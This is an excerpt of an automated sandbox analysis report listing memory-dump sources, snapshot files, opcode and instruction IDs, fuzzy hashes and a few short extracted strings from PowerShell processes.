                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7ff848db0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e676f20ecae70ee9128c4372401f11ea87f341b570606786dafb34a0b557c467
                          • Instruction ID: f460cffe1eb5994a9058fb00f998b6d43dfae0348791fc9ebdcb19576ad41e62
                          • Opcode Fuzzy Hash: e676f20ecae70ee9128c4372401f11ea87f341b570606786dafb34a0b557c467
                          • Instruction Fuzzy Hash: 16024571E0EA8A4FE7A6A63858153B47FE1EF62261F1801BBC04DC71D3DF19AC0A8355
                          Memory Dump Source
                          • Source File: 00000002.00000002.2253082152.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7ff848ce0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4042a3db05c8a6726433d41b410bf8d1842eb76bdc411f0497b6ff410dd2b4de
                          • Instruction ID: 9d9528da754f8a976539e977836b56363e5e603fc8ad84395355dbed63a894ce
                          • Opcode Fuzzy Hash: 4042a3db05c8a6726433d41b410bf8d1842eb76bdc411f0497b6ff410dd2b4de
                          • Instruction Fuzzy Hash: 12F19130A1CA498FDB99EF58C495AB97BF1FF68340F14416AD409D7296CB39EC81CB81
                          Memory Dump Source
                          • Source File: 00000002.00000002.2253510591.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7ff848db0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2ac2eafbde6326a6a0070e9034af2b4c9095b9786fd1ab15dafb2851a90a6e9b
                          • Instruction ID: a56392ac3037f1cc144f714c42a50b7788b5468b4af5156ca8aa2f667b388edd
                          • Opcode Fuzzy Hash: 2ac2eafbde6326a6a0070e9034af2b4c9095b9786fd1ab15dafb2851a90a6e9b
                          • Instruction Fuzzy Hash: 22E11531E0FA865FE795EB6858553B87BE1EF65660F0800BEC04DC71C3DE29AC898356
                          Memory Dump Source
                          • Source File: 00000002.00000002.2253510591.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7ff848db0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7da2ed5f85da8c55da0c79c74c10d22dfcbea4d9661fec9af5fe1c15735e23df
                          • Instruction ID: faa7daae791d7537adc4122ed08b4dfdd056fc27016c53b86486110b8248f349
                          • Opcode Fuzzy Hash: 7da2ed5f85da8c55da0c79c74c10d22dfcbea4d9661fec9af5fe1c15735e23df
                          • Instruction Fuzzy Hash: CCB15A31E1FA865FE799E62858552B537E2EF623A0F0801BED54DC31D3EF18AC098355
                          Memory Dump Source
                          • Source File: 00000002.00000002.2253082152.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7ff848ce0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c19bd93d892d196e2f94e73dedb79555290df82bd047498d847c05981e17b83d
                          • Instruction ID: 2d3e13e0ff24840540cae6a2ea5014ff6a727433808bdfffd7f03a14fed88429
                          • Opcode Fuzzy Hash: c19bd93d892d196e2f94e73dedb79555290df82bd047498d847c05981e17b83d
                          • Instruction Fuzzy Hash: E0A1827060CA4D8FEBA8EF28D8557F937E1FF58350F04422AE84DC7295CB34A9458B86
                          Memory Dump Source
                          • Source File: 00000002.00000002.2253510591.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7ff848db0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f9e907142836815d8eea3898bc024d5ca9863d71cf660f495709675038eb9fd4
                          • Instruction ID: 16e60099bc79178dcd548043a9430e046995e5ac05d475a715899cf32688f7c6
                          • Opcode Fuzzy Hash: f9e907142836815d8eea3898bc024d5ca9863d71cf660f495709675038eb9fd4
                          • Instruction Fuzzy Hash: 49712632E1EA594FEB99F62C58466B977D1EF65660F0401BED00DC3192EF15EC0AC389
                          Memory Dump Source
                          • Source File: 00000002.00000002.2253082152.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7ff848ce0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6f08230e69a7cccd1dd383aab5d427195f83512cdc9ea7adc58145be4bcd63a7
                          • Instruction ID: 1d58ab85f059873a2fdfd990dbd7ff9dd40dea66ed29c2315c0524392b78f428
                          • Opcode Fuzzy Hash: 6f08230e69a7cccd1dd383aab5d427195f83512cdc9ea7adc58145be4bcd63a7
                          • Instruction Fuzzy Hash: 6D310631A1CA098FEB88EA1CC495AB573E1FF99351B10057ED48EC3666DA26FC42C781
                          Memory Dump Source
                          • Source File: 00000002.00000002.2253510591.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7ff848db0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 21f824af3bba129e4c3fbd86580f5ab23dc44de6cdd70ffd52b650fc2f1f24ce
                          • Instruction ID: 8b9a2c7851768b1b6ecd3e1f24c59562c82fd83612ab76452484430f3439ba35
                          • Opcode Fuzzy Hash: 21f824af3bba129e4c3fbd86580f5ab23dc44de6cdd70ffd52b650fc2f1f24ce
                          • Instruction Fuzzy Hash: BE31E622D1FAC74FF796A72818152B8AAF0EF656A0F4801BAD41DC31D3DF0C6C08831A
                          Memory Dump Source
                          • Source File: 00000002.00000002.2253510591.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7ff848db0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 78527321190ed2283672dc0026eb2821e80b23ed9e9ce6c7a7d3960270fdd469
                          • Instruction ID: 778ca23e70f964cfa08f8584c635120fd12899eeed79526573666f5b23e7e329
                          • Opcode Fuzzy Hash: 78527321190ed2283672dc0026eb2821e80b23ed9e9ce6c7a7d3960270fdd469
                          • Instruction Fuzzy Hash: 2C21F621E1FA8A4FE3A9E62C14553B566D3EF626A0F4801BAD20DC71D3DF19AC49C249
                          Memory Dump Source
                          • Source File: 00000002.00000002.2253082152.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7ff848ce0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d8e3271e1f95808f0c92b6ccfabcb6a37f82dd38e250572b5b2dd6bdb6d88a12
                          • Instruction ID: d833c06bc98049cf6dbe1b66a3109fbb69beb7f08fcce0b2360efe6079c5c104
                          • Opcode Fuzzy Hash: d8e3271e1f95808f0c92b6ccfabcb6a37f82dd38e250572b5b2dd6bdb6d88a12
                          • Instruction Fuzzy Hash: 5331013081964E8FFBF8EB24CC5ABFA3290FF42399F400139D40D96592DB3C6985CA25
                          Memory Dump Source
                          • Source File: 00000002.00000002.2253510591.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7ff848db0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cfb6335e2faa32c1c714515adbb9b373d82ef517a0ffcf86c1713f858dd2a223
                          • Instruction ID: ae86f7ac07c1d6238662be1847ece2b7b5eb7a2faf723308b02b4fb0eb466501
                          • Opcode Fuzzy Hash: cfb6335e2faa32c1c714515adbb9b373d82ef517a0ffcf86c1713f858dd2a223
                          • Instruction Fuzzy Hash: 5221D022E0FAC55FFB55A33C28582746AE1EF6AA90F0901FAD059C71D7DD0C584A832A
                          Memory Dump Source
                          • Source File: 00000002.00000002.2253082152.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7ff848ce0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4b087f3ca92c2311e80b188d83d947c27c563e54626839b894b76540d165197c
                          • Instruction ID: 6197291c6594a357b7f33fb97b0b6713c80dc866da0f84f3946b6f355e64e559
                          • Opcode Fuzzy Hash: 4b087f3ca92c2311e80b188d83d947c27c563e54626839b894b76540d165197c
                          • Instruction Fuzzy Hash: DE01447111CB084FDB44EF4CE451AA5B7E0FB95364F10056DE58AC3655D726E882CB45
                          Memory Dump Source
                          • Source File: 00000002.00000002.2253082152.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7ff848ce0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1c6d3bc046ce586e77bc24bc9e8ede169c5ceef2ded8fa789533d3d7604be322
                          • Instruction ID: 8df7ffaf8aab22e94478f2caeaaa27b85c4209ee64d61dc1b8c55414c4403e61
                          • Opcode Fuzzy Hash: 1c6d3bc046ce586e77bc24bc9e8ede169c5ceef2ded8fa789533d3d7604be322
                          • Instruction Fuzzy Hash: 47F06C3275CA044FDB4CEA1CF4419B573D1E795361F10017EF48BC3696D917E842C685
                          Memory Dump Source
                          • Source File: 00000002.00000002.2253510591.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7ff848db0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2aa5b5cbe279a041a5eb5e7b46980975138874fd279699c22a4625f460d9fc7e
                          • Instruction ID: 52b117e2793392701b91597360c0d1074a8f7919f0ec5fff13a714104abb3998
                          • Opcode Fuzzy Hash: 2aa5b5cbe279a041a5eb5e7b46980975138874fd279699c22a4625f460d9fc7e
                          • Instruction Fuzzy Hash: EEF0B432D0DA889FDF95FF6884455A9BBF0EF65251B0400BFD049D3192EA19A849C781
                          Memory Dump Source
                          • Source File: 00000002.00000002.2253510591.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7ff848db0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2aa5b5cbe279a041a5eb5e7b46980975138874fd279699c22a4625f460d9fc7e
                          • Instruction ID: 1f90bf298bd6f4dec95992fdb917d3565810b3ab60371dc65359e58723e6ae7c
                          • Opcode Fuzzy Hash: 2aa5b5cbe279a041a5eb5e7b46980975138874fd279699c22a4625f460d9fc7e
                          • Instruction Fuzzy Hash: 48F0B43290EA888FDFA5FB6884459E9BBF0EF65251B0400BFD049D3192DE19A888C741
                          Memory Dump Source
                          • Source File: 00000002.00000002.2253510591.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7ff848db0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cbf43c1ae71aa95561cc665f56a26c6d6a3ef10eca82676c7e7ad53dd1152956
                          • Instruction ID: a6a00a2dcba9fb3e73fb20ae977f171ab3232d38271bdc3d2681985d08935e45
                          • Opcode Fuzzy Hash: cbf43c1ae71aa95561cc665f56a26c6d6a3ef10eca82676c7e7ad53dd1152956
                          • Instruction Fuzzy Hash: D0F02721A0EE884FEBA5FB2C84915B177E0EF2935071800EAC049C7187DA19AC85C795
                          Memory Dump Source
                          • Source File: 00000004.00000002.3012821422.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_49d0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 13c798d89fd2000b6a35dba18ff4acb8c06f661102808463ad30475b642b9595
                          • Instruction ID: f20529f49d9df41cc0245fe1bc0fb3485f4a64bb143a5e3e795b2aa6566e1aac
                          • Opcode Fuzzy Hash: 13c798d89fd2000b6a35dba18ff4acb8c06f661102808463ad30475b642b9595
                          • Instruction Fuzzy Hash: B2B13E70E00209DFDB10CFA9D9867ADBBF6AF88314F14C539E416E7258EB74A845CB91
                          Memory Dump Source
                          • Source File: 00000004.00000002.3012821422.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_49d0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2102326debb207a66430d054c398805faedd417cbee9543b4c5cc8d79b03d6c0
                          • Instruction ID: 007e9ba0fbdde513fb3c4db3c448920207fb3d1226233648ba79f9d24942c032
                          • Opcode Fuzzy Hash: 2102326debb207a66430d054c398805faedd417cbee9543b4c5cc8d79b03d6c0
                          • Instruction Fuzzy Hash: 9AB18070E00209DFDB14CFA8D98679DBBF6AF88314F14C539E816E7258EB74A845CB81
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.3034431217.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7740000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'sq$4'sq$4'sq$4'sq$4'sq$4'sq$tPsq$tPsq$$sq$$sq$$sq$$sq$$sq$$sq$$sq$$sq$$sq$$sq
                          • API String ID: 0-1951506915
                          • Opcode ID: 4462fb632ea14716170f32d91511f6a03e81d42f5eac475457ba5669bc0f9c48
                          • Instruction ID: 099df68660083c7efcebcc565cf8e7c077c3bbfb5e812c819428d22f9c5e4819
                          • Opcode Fuzzy Hash: 4462fb632ea14716170f32d91511f6a03e81d42f5eac475457ba5669bc0f9c48
                          • Instruction Fuzzy Hash: AA2259F170421ADFCB259BB9C85066ABBE2AFC6294F14887AD505CB252DF31DC41C7A3
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.3034431217.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7740000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'sq$4'sq$tPsq$tPsq$$sq$$sq$$sq
                          • API String ID: 0-2404318043
                          • Opcode ID: 07184af5380a720430d65236f01147771a3eb811aab87c08203d9a43bf455309
                          • Instruction ID: 469e9e44c8ac578f0fa51918e721003da13b3c2bc5aca3c8176c24032b033022
                          • Opcode Fuzzy Hash: 07184af5380a720430d65236f01147771a3eb811aab87c08203d9a43bf455309
                          • Instruction Fuzzy Hash: CBD16AB06093859FC7168B788855A66BFB1AF87250F58C4DBE848DF2A3CB35DC42C761
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.3034431217.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7740000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'sq$4'sq$4'sq$4'sq$4'sq$4'sq
                          • API String ID: 0-2534308389
                          • Opcode ID: 182f35254703a4653348568bc743e6d6e033e80602dcdd681e74f155cfe2b991
                          • Instruction ID: 5230a54795d47ffa6a9ededd270d6bf92a7dbbfe9d01ec7cf4663c60079cd07c
                          • Opcode Fuzzy Hash: 182f35254703a4653348568bc743e6d6e033e80602dcdd681e74f155cfe2b991
                          • Instruction Fuzzy Hash: CCD19FB0B102069FCB18DBA8C555BAEBBB3AF99344F14C458E501AF355CB75EC82CB91
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.3012821422.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_49d0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: Hwq$$sq$$sq
                          • API String ID: 0-2950745084
                          • Opcode ID: 0c5ace64b95666daa76f760aa201c41e2d81a2cfd7e154a661f23bde976bbe22
                          • Instruction ID: ac8486460f52a1ae9eef8ec083c98ec8784545977ada8bae69ea079fc45598b0
                          • Opcode Fuzzy Hash: 0c5ace64b95666daa76f760aa201c41e2d81a2cfd7e154a661f23bde976bbe22
                          • Instruction Fuzzy Hash: C6227D34B012548FCB25EF64C8946AEB7B6BF89304F1581E9D50AAB361DF35AD81CF80
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.3034431217.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7740000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'sq$4'sq$$sq
                          • API String ID: 0-298899069
                          • Opcode ID: 1565ee6137a19edfd3f5dc068a4065564443dc9f80c73c5e9e34170685806f98
                          • Instruction ID: ae195f596814549ff14fe3a6e841b319b647de104da3e4b306b34bf273102667
                          • Opcode Fuzzy Hash: 1565ee6137a19edfd3f5dc068a4065564443dc9f80c73c5e9e34170685806f98
                          • Instruction Fuzzy Hash: 05A13BB17043498FCB269B78886177ABBA26F86344F1488BAD541CF292DF35DC41C7A3
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.3034431217.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7740000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'sq$4'sq$4'sq
                          • API String ID: 0-1334358483
                          • Opcode ID: 6ae92fa5c143fd74c68424d9c13920c4fefdf836f6adb22216d7cd72e0f03eab
                          • Instruction ID: 64aa233b36bf228f88c4fa9b816a23d32fe374ea60cb90f031be5a6e1162827e
                          • Opcode Fuzzy Hash: 6ae92fa5c143fd74c68424d9c13920c4fefdf836f6adb22216d7cd72e0f03eab
                          • Instruction Fuzzy Hash: FBB1AEB0A00206DFDB19CFA8C541BAEBBB2AF89344F15C559E5016F355CB75AC82CBD1
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.3034431217.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7740000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: $sq$$sq$$sq
                          • API String ID: 0-2087541542
                          • Opcode ID: 66e0cc70a60a525e068a1abcfb0197d0d2eda5a2354b157fabee5b4769da6721
                          • Instruction ID: 8d5862d845e7164a068877af7aeba5c75846e955d014e772f1a66b4ce0c88ac7
                          • Opcode Fuzzy Hash: 66e0cc70a60a525e068a1abcfb0197d0d2eda5a2354b157fabee5b4769da6721
                          • Instruction Fuzzy Hash: 6F413AB6B002159FCB249AA98C402BEF7A1AFC9354B1485AACE06EB241DF31DD41C7D5
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.3034431217.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7740000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'sq$4'sq
                          • API String ID: 0-780347173
                          • Opcode ID: 3b7b16fe2442ad27e053b0b990dfa141418051b4a4559def5abc391045875fab
                          • Instruction ID: 07692312e8710659fcce028a482e6abcd4a50ded4b4b75d2558431e1df446721
                          • Opcode Fuzzy Hash: 3b7b16fe2442ad27e053b0b990dfa141418051b4a4559def5abc391045875fab
                          • Instruction Fuzzy Hash: 6BF191B4B002159FDB24DB68CD51BAABBB3BF85344F108499E509AF781CB71AD81CF91
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.3034431217.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7740000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: $sq$$sq
                          • API String ID: 0-1184984226
                          • Opcode ID: 22ea5a770338e0032338358859ed6c4868f066fbb7b2ce46b2fdf3e148d17fa2
                          • Instruction ID: 7b1bcce25f39bae8e14127454035a6b6d0bb975b328dd6a7c81821f730e04260
                          • Opcode Fuzzy Hash: 22ea5a770338e0032338358859ed6c4868f066fbb7b2ce46b2fdf3e148d17fa2
                          • Instruction Fuzzy Hash: 6F21F6B6904356DFCB248F588D806B9FBB0BF86254B2585AACD19B7202D7309940CB98
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.3034431217.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7740000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'sq
                          • API String ID: 0-1075809040
                          • Opcode ID: eb84a156c127e57459603c3b598b3a75f028b2f0aa7a11d8762b869e222bcd8f
                          • Instruction ID: 2651e2de72d123fdece4c8b44496cc380187c3369865534644c490bb3dc3757f
                          • Opcode Fuzzy Hash: eb84a156c127e57459603c3b598b3a75f028b2f0aa7a11d8762b869e222bcd8f
                          • Instruction Fuzzy Hash: B841F4F0B0070ADFCB258F698564B3A7BE2AF85794F188879D9019B251DB35EC80C753
                          Memory Dump Source
                          • Source File: 00000004.00000002.3034431217.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7740000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 71b0729811829d9b2c954e3e0558e97b8cc08857e4712b42bde787596f1ad483
                          • Instruction ID: 52d8e475a12ffde080e9eef791e1654633c8dc7380cdefffbc9bbdff6081045d
                          • Opcode Fuzzy Hash: 71b0729811829d9b2c954e3e0558e97b8cc08857e4712b42bde787596f1ad483
                          • Instruction Fuzzy Hash: ED526CB4B00209DFDB54CB98C485A6ABBB2BF89354F25C469D905AF751CB32EC42CF91
                          Memory Dump Source
                          • Source File: 00000004.00000002.3034431217.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7740000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a87580370fc8e00b29e93da549d015e7ad2c10644d6e980ca1de3ab3dded28e0
                          • Instruction ID: 2bfebb8f0693a28983c109ceb4efa6da2bce91f6c2cb3f205106541ea0bb8fe4
                          • Opcode Fuzzy Hash: a87580370fc8e00b29e93da549d015e7ad2c10644d6e980ca1de3ab3dded28e0
                          • Instruction Fuzzy Hash: 18225BB4B00205DFDB54CB98C585A69BBB2BF89754F25C4A9D819AF352CB32EC42CF41
                          Memory Dump Source
                          • Source File: 00000004.00000002.3012821422.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_49d0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 606e22c565cdbc015f2f99c38efe5432c09efe66391bd4ee9ed91b83846b1fd4
                          • Instruction ID: 1a43239e47db3cc77d9f4bf470126253cbcbb5f5351ac9010562aaca4a21236e
                          • Opcode Fuzzy Hash: 606e22c565cdbc015f2f99c38efe5432c09efe66391bd4ee9ed91b83846b1fd4
                          • Instruction Fuzzy Hash: 1B123B74A012499FCB15CFA8C584AAEFBB2FF88310F24C569E815AB365C735ED41CB91
                          Memory Dump Source
                          • Source File: 00000004.00000002.3034431217.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7740000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 84c7576b21e2390f700f1a34bea41935afcaa4cc8bc7ba84e45780b25f8ec5e4
                          • Instruction ID: 72e3e29e0f4821116501fb32fffa575eb8f6a2dff0c37da6a6721e498890fbe5
                          • Opcode Fuzzy Hash: 84c7576b21e2390f700f1a34bea41935afcaa4cc8bc7ba84e45780b25f8ec5e4
                          • Instruction Fuzzy Hash: BDF168B4B00206DFDB54CB98C481A69BBB2FF85354F14C4A9E905AF752CB32EC46CB81
                          Memory Dump Source
                          • Source File: 00000004.00000002.3012821422.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_49d0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 38e6ffbbc30ff88dc24ca571394cfc1fa07ae46b4a3663aaff37e1370f71956c
                          • Instruction ID: 3de8b07c689877b2db2c1922ffaa0cb58183674d0949d767cea88f8b7e340cb5
                          • Opcode Fuzzy Hash: 38e6ffbbc30ff88dc24ca571394cfc1fa07ae46b4a3663aaff37e1370f71956c
                          • Instruction Fuzzy Hash: 63D1E674A01219AFDB14CFA8D484AADFBB2FF88311F25C569E805AB351C735ED81CB91
                          Memory Dump Source
                          • Source File: 00000004.00000002.3012821422.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_49d0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 903410fa1b0210d8cf77d8e13fc73b3f9cd98719089c5a9c19b07878bdfa5d0d
                          • Instruction ID: 03ff8c10d9247241e42d324757b3a4f993d7a5ed2baf2374bd5900330f9e6a8a
                          • Opcode Fuzzy Hash: 903410fa1b0210d8cf77d8e13fc73b3f9cd98719089c5a9c19b07878bdfa5d0d
                          • Instruction Fuzzy Hash: A2C18B75A002489FCB14EFA4D984A9DBBF6FF85314F158569E806AF265CB34EC49CB40
                          Memory Dump Source
                          • Source File: 00000004.00000002.3012821422.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_49d0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f5639291f4714c494f623af5a41b0d34afbb3491ccc523d9217bb5258dba93a5
                          • Instruction ID: cac90f03fb307ff82bc68d253b68c69c9678e8f9e0b1e6dbd017ee74b72b3f0f
                          • Opcode Fuzzy Hash: f5639291f4714c494f623af5a41b0d34afbb3491ccc523d9217bb5258dba93a5
                          • Instruction Fuzzy Hash: 5CC15E71E00209DFDB10CFA8D9867ADBBF6AF48314F14C539E416AB258EB74A845CB91
                          Memory Dump Source
                          • Source File: 00000004.00000002.3012821422.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_49d0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b51b22bc09bb4f76bec5d0734183845398599d57322c0e03cabf3e038f160aaa
                          • Instruction ID: 1f6c857215e272bca1952db011feda3c63692b03dfbb5c0d9fdd447a37c9149c
                          • Opcode Fuzzy Hash: b51b22bc09bb4f76bec5d0734183845398599d57322c0e03cabf3e038f160aaa
                          • Instruction Fuzzy Hash: C3B16E71E00209DFDB10CFA8D98679DBBF6AF48314F14C539E816EB258EB74A845CB91
                          Memory Dump Source
                          • Source File: 00000004.00000002.3034431217.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7740000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7c934af3a8ccb2e74a8c14cdaf432ff10ed971bbed34124eb23c5b11fac37ee7
                          • Instruction ID: 1ae7a011bff8905eefd2ae33b41cc550591cf08050e1ea82eea6b96d9eea6b1f
                          • Opcode Fuzzy Hash: 7c934af3a8ccb2e74a8c14cdaf432ff10ed971bbed34124eb23c5b11fac37ee7
                          • Instruction Fuzzy Hash: D091D1B4B00205AFD714CB68C945B9EBBF2AF89344F148469E901BF791CB76EC45CBA1
                          Memory Dump Source
